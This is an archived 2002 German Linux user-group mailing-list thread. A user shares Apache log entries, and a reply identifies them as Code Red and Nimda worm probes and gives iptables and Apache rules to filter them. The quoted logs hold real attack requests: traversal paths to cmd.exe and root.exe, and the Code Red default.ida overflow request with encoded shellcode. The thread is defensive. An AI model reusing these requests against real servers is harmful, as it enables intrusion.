[LUGA] Mit freundlicher Unterstützung von:
OCG

Mail Thread Index


[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

AW: [luga] Apache Log



Das sind Code Red I/II oder Nimda - Internetwürmer, die u.a.
Sicherheitslücken im MS-IIS ausnützen um sich zu verbreiten. Es ist wirklich
erstaunlich, wie lange sich die halten ... Code Red war IMHO letztes Jahr im
Juni, Nimda im September.
Wenn du genügend Platz für die Logfiles hast, ignorier die Meldungen
einfach. Falls du wenig Platz hast, dann kannst du entweder iptables
installieren und mit folgender Rule die Meldungen bereits beim Eintreffen
verwerfen
  iptables -A INPUT -i eth0 -j filt_match -d $EXTERNAL -m string --string
"cmd.exe" -p tcp --dport 80
Für Apache selber gäbe es noch folgende Möglichkeit:
  SetEnvIf Request_URI \cmd.exe|\root.exe nimda
  Customlog /../../access_log common env=!nimda
  Add in
  <IfModule mod_alias.c>
   RedirectMatch (.*)\root.exe$ http://NimdaIsNotForMe.invalid$1
   RedirectMatch (.*)\cmd.exe$ http://NimdaIsNotForMe.invalid$1
  </IfModule>

Grüße,
Stefan

-----Ursprüngliche Nachricht-----
Von: richard.prokesch@gmx.at [mailto:richard.prokesch@gmx.at]
Gesendet: Dienstag, 15. Jänner 2002 11:20
An: luga@luga.at
Betreff: [luga] Apache Log


Hallo Liste! 

Habe eine typische Newbie-Frage... 

Folgendes ist mir gestern aufgefallen (obwohl das schon länger vorkommt): 

Ich hab in den Apachelogs auf meinem privaten Linux PC, mit dem ich
gelegentlich online bin, folgende Einträge gefunden: 

62.10.121.7 - - [23/Dec/2001:01:16:15 +0100] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 280 
62.10.121.7 - - [23/Dec/2001:01:16:16 +0100] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 278 
62.10.121.7 - - [23/Dec/2001:01:16:17 +0100] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 
62.10.121.7 - - [23/Dec/2001:01:16:18 +0100] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 
62.10.121.7 - - [23/Dec/2001:01:16:19 +0100] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 
62.10.121.7 - - [23/Dec/2001:01:17:52 +0100] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 319

62.10.121.7 - - [23/Dec/2001:01:17:54 +0100] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 319

62.10.121.7 - - [23/Dec/2001:01:17:55 +0100] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
HTTP/1.0" 404 335

62.10.121.7 - - [23/Dec/2001:01:17:57 +0100] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 
62.10.121.7 - - [23/Dec/2001:01:19:28 +0100] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 
62.10.121.7 - - [23/Dec/2001:01:19:29 +0100] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 
62.10.121.7 - - [23/Dec/2001:01:19:35 +0100] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 
62.10.121.7 - - [23/Dec/2001:01:19:36 +0100] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 
62.10.121.7 - - [23/Dec/2001:01:19:38 +0100] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 
62.10.121.7 - - [23/Dec/2001:01:19:40 +0100] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

62.10.121.7 - - [23/Dec/2001:01:19:44 +0100] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 

... 

218.20.158.82 - - [13/Jan/2002:17:55:00 +0100] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

HTTP/1.0" 400 322 

...usw... 

Das tritt fast jedes mal auf, wenn ich im Internet (über jet2web adsl) bin. 

Sieht aus als würde da ein Skript auf meinen http-server zugreifen wollen?!?


Es hat zwar keinen Effekt, würde mich aber trotzdem interessieren was das
ist... 

Danke im vorraus!

Richard. 

-- 
GMX - Die Kommunikationsplattform im Internet.
http://www.gmx.net



powered by LINUX the choice of a gnu generation
linux user group austria;
Suche
Suche
Letzte Änderung:
webmaster@luga.at
September 2010